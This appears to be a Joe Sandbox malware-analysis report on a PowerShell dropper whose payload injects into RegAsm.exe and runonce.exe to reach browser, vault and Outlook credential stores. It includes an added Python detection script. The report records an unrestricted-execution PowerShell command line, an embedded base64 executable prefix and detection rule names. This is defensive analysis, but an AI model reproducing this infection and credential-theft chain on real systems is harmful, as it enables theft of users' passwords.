                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_053470E910_2_053470E9
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052970C010_2_052970C0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0533F0CC10_2_0533F0CC
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534132D10_2_0534132D
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0527D34C10_2_0527D34C
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052D739A10_2_052D739A
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052952A010_2_052952A0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_053312ED10_2_053312ED
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052AB2C010_2_052AB2C0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05347D7310_2_05347D73
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05293D4010_2_05293D40
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05341D5A10_2_05341D5A
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052AFDC010_2_052AFDC0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05309C3210_2_05309C32
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534FCF210_2_0534FCF2
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534FF0910_2_0534FF09
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534FFB110_2_0534FFB1
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05291F9210_2_05291F92
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05253FD510_2_05253FD5
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05253FD210_2_05253FD2
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05299EB010_2_05299EB0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0532591010_2_05325910
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0529995010_2_05299950
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052AB95010_2_052AB950
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052FD80010_2_052FD800
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052938E010_2_052938E0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534FB7610_2_0534FB76
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052AFB8010_2_052AFB80
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05305BF010_2_05305BF0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052CDBF910_2_052CDBF9
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05303A6C10_2_05303A6C
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05347A4610_2_05347A46
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0534FA4910_2_0534FA49
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052D5AA010_2_052D5AA0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_05331AA310_2_05331AA3
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0532DAAC10_2_0532DAAC
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0533DAC610_2_0533DAC6
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_03261FD010_2_03261FD0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0325CE4710_2_0325CE47
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0325CE5010_2_0325CE50
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0325B1A410_2_0325B1A4
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0325B1B010_2_0325B1B0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0325B1F910_2_0325B1F9
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0325B06010_2_0325B060
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0325D07010_2_0325D070
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0326567010_2_03265670
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0326387B10_2_0326387B
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0326388010_2_03263880
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0327BE5010_2_0327BE50
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0503E46710_2_0503E467
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0503E7FC10_2_0503E7FC
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0503D8C810_2_0503D8C8
                Source: Joe Sandbox View; Dropped File: C:\Users\user\AppData\Local\Temp\x.exe 7D7EA0439478D6FE199D07F2FBF892ACD472BA769AA1432A87008D5EF790496F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: String function: 02D57E54 appears 110 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: String function: 02D45130 appears 58 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: String function: 02CFB970 appears 280 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: String function: 02D7EA12 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: String function: 02D8F290 appears 105 times
                Source: C:\Windows\SysWOW64\runonce.exe; Code function: String function: 0527B970 appears 280 times
                Source: C:\Windows\SysWOW64\runonce.exe; Code function: String function: 0530F290 appears 105 times
                Source: C:\Windows\SysWOW64\runonce.exe; Code function: String function: 052FEA12 appears 86 times
                Source: C:\Windows\SysWOW64\runonce.exe; Code function: String function: 052D7E54 appears 110 times
                Source: C:\Windows\SysWOW64\runonce.exe; Code function: String function: 052C5130 appears 58 times
                Source: Process Memory Space: powershell.exe PID: 7352, type: MEMORYSTR; Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC (author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution)
                Source: x.exe.0.dr; Static PE information: Section: |]e@TkD ZLIB complexity 1.0003320970117846
                Source: classification engine; Classification label: mal100.troj.spyw.expl.evad.winPS1@11/8@6/5
                Source: C:\Users\user\AppData\Local\Temp\x.exe; File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.log
                Source: C:\Users\user\AppData\Local\Temp\x.exe; Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7364:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gyz32a3u.mmc.ps1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File read: C:\Users\desktop.ini
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                Source: runonce.exe, 0000000A.00000002.2608327762.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.2021290021.00000000036CF000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.2019511464.00000000036A4000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.2608327762.00000000036C5000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.2019614143.00000000036C5000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: LLLLLLLLASSSEERRRR.ps1; ReversingLabs: Detection: 24%
                Source: unknown; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\LLLLLLLLASSSEERRRR.ps1"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknown; Process created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\LLLLLLLLASSSEERRRR.ps1"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                Source: C:\Users\user\AppData\Local\Temp\x.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe; Process created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"
                Source: C:\Windows\SysWOW64\runonce.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appresolver.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: bcp47langs.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: slc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sppc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: linkinfo.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ntshrui.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cscapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: policymanager.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msvcp110_win.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: edputil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: apphelp.dll
                Source: C:\Windows\System32\notepad.exe; Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\notepad.exe; Section loaded: uxtheme.dll
                Source: C:\Windows\System32\notepad.exe; Section loaded: mrmcorer.dll
                Source: C:\Windows\System32\notepad.exe; Section loaded: windows.storage.dll
                Source: C:\Windows\System32\notepad.exe; Section loaded: wldp.dll
                Source: C:\Windows\System32\notepad.exe; Section loaded: textshaping.dll
                Source: C:\Windows\System32\notepad.exe; Section loaded: efswrt.dll
                Source: C:\Windows\System32\notepad.exe; Section loaded: mpr.dll
                Source: C:\Windows\System32\notepad.exe; Section loaded: wintypes.dll
                Source: C:\Windows\System32\notepad.exe; Section loaded: twinapi.appcore.dll
                Source: C:\Windows\System32\notepad.exe; Section loaded: oleacc.dll
                Source: C:\Windows\System32\notepad.exe; Section loaded: textinputframework.dll
                Source: C:\Windows\System32\notepad.exe; Section loaded: coreuicomponents.dll
                Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\notepad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Binary string: runonce.pdbGCTL source: y85te3vqfc6QGAKyw78l.exe, 00000009.00000002.2608539411.000000000085E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000005.00000002.1836620489.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.1838270102.000000000509F000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.2614142025.0000000005250000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.2614142025.00000000053EE000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.1835974299.0000000004EE5000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000005.00000002.1836620489.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, runonce.exe, 0000000A.00000003.1838270102.000000000509F000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.2614142025.0000000005250000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.2614142025.00000000053EE000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.1835974299.0000000004EE5000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: runonce.pdb source: y85te3vqfc6QGAKyw78l.exe, 00000009.00000002.2608539411.000000000085E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: VZXCSD.pdb source: powershell.exe, 00000000.00000002.1362764872.000000000633A000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000000.1344241466.00000000003FE000.00000002.00000001.01000000.0000000A.sdmp, x.exe.0.dr
                Source: Binary string: VZXCSD.pdbX source: powershell.exe, 00000000.00000002.1362764872.000000000633A000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000000.1344241466.00000000003FE000.00000002.00000001.01000000.0000000A.sdmp, x.exe.0.dr
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: y85te3vqfc6QGAKyw78l.exe, 00000009.00000000.1756318795.000000000012F000.00000002.00000001.01000000.0000000B.sdmp, y85te3vqfc6QGAKyw78l.exe, 0000000D.00000002.2602571364.000000000012F000.00000002.00000001.01000000.0000000B.sdmp
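The module list above is most telling for runonce.exe: a system binary from SysWOW64 that pulls in winsqlite3.dll, vaultcli.dll and dpapi.dll next to wininet.dll and winhttp.dll, and then opens the Outlook profile key, is reading credential stores rather than doing its own job, which is the footprint of code injected into a legitimate host. The script below is an added example, not part of the Joe Sandbox report, that turns that observation into a per-process rule over "Section loaded" rows. The sample rows are copied from the report above; the capability table, the weights, the verdict rule and the "under C:\Windows" heuristic are this editor's assumptions.

```python
"""Per-process capability scoring over the 'Section loaded' rows of a sandbox
report.  Added example: the capability table, weights and verdict rule are
editorial assumptions, not Joe Sandbox logic."""
import re
from collections import defaultdict

# Rows copied from the report.  The page fuses the path and the signature
# text ("...runonce.exeSection loaded: ..."); the parser accepts that form,
# a ' | ' separated form, and a trailing "Jump to behavior" link label.
SAMPLE_ROWS = r"""
Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\runonce.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\runonce.exeSection loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\runonce.exeSection loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\runonce.exeSection loaded: dpapi.dll
Source: C:\Windows\SysWOW64\runonce.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dll
"""

ROW = re.compile(
    r"Source:\s*(?P<proc>.+?\.exe)\s*\|?\s*Section loaded:\s*(?P<dll>[\w.\-]+?\.dll)",
    re.IGNORECASE,
)

# A capability is present when ANY listed module is loaded.  Weights are
# editorial: touching a credential store counts more than merely being able
# to talk HTTP, which almost any process can.
CAPABILITIES = {
    "browser_store_access": ({"winsqlite3.dll"}, 2),   # SQLite-backed browser login/cookie DBs
    "vault_access":         ({"vaultcli.dll"}, 2),      # Windows Credential Manager
    "dpapi_unprotect":      ({"dpapi.dll"}, 1),         # CryptUnprotectData on what the stores hold
    "http_egress":          ({"wininet.dll", "winhttp.dll"}, 1),
}
STORES = {"browser_store_access", "vault_access"}


def parse_rows(text: str) -> dict[str, set[str]]:
    """Map each process path to the lower-cased set of modules it loaded."""
    loaded = defaultdict(set)
    for m in ROW.finditer(text):
        loaded[m["proc"]].add(m["dll"].lower())
    return dict(loaded)


def assess(modules: set[str]) -> tuple[int, list[str]]:
    """Return (score, capabilities) for one process's module set."""
    score, caps = 0, []
    for name, (dlls, weight) in CAPABILITIES.items():
        if modules & dlls:
            caps.append(name)
            score += weight
    return score, caps


def triage(text: str) -> dict[str, dict]:
    """Verdict per process.  'flagged': a credential store was opened AND the
    DPAPI decryption path was loaded.  'injected_host_suspected': the same,
    in a binary shipped under C:\\Windows, whose own code has no business
    reading browser databases (the usual sign of a hollowed or injected host)."""
    result = {}
    for proc, modules in parse_rows(text).items():
        score, caps = assess(modules)
        flagged = bool(STORES & set(caps)) and "dpapi_unprotect" in caps
        system_binary = proc.lower().startswith("c:\\windows\\")
        result[proc] = {
            "score": score,
            "capabilities": caps,
            "flagged": flagged,
            "injected_host_suspected": flagged and system_binary,
        }
    return result


if __name__ == "__main__":
    for proc, verdict in triage(SAMPLE_ROWS).items():
        print(f"{proc}: {verdict}")
```

The rule deliberately requires two independent signals (a store module and the DPAPI path) before it flags, because x.exe loading cryptsp.dll and rsaenh.dll is ordinary .NET runtime behaviour and must not trip it; the "system binary" check is what separates an injected runonce.exe from a browser that legitimately loads the same modules.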

                Data Obfuscation

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEFAM (buffer truncated by the report; the visible prefix decodes to an MZ/PE header, i.e. the script carries an embedded executable)
                Source: x.exe.0.dr | Static PE information: TimeDateStamp 0xF61719C5 [Sun Oct 31 23:37:41 2100 UTC] (a link time in the future, so the field is forged)
                Source: x.exe.0.dr | Static PE information: section name: |]e@TkD
                Source: x.exe.0.dr | Static PE information: section name: (empty)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0041F04F push ebx; ret | 5_2_0041F058
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00403280 push eax; ret | 5_2_00403282
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0041AB61 pushfd; ret | 5_2_0041AB78
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0041ABD6 push ds; ret | 5_2_0041ABD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0040D38A push edx; iretd | 5_2_0040D453
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00426CC3 pushad; iretd | 5_2_00426CEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004084DA push esi; retf | 5_2_004084DD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004084FF push ebp; iretd | 5_2_00408502
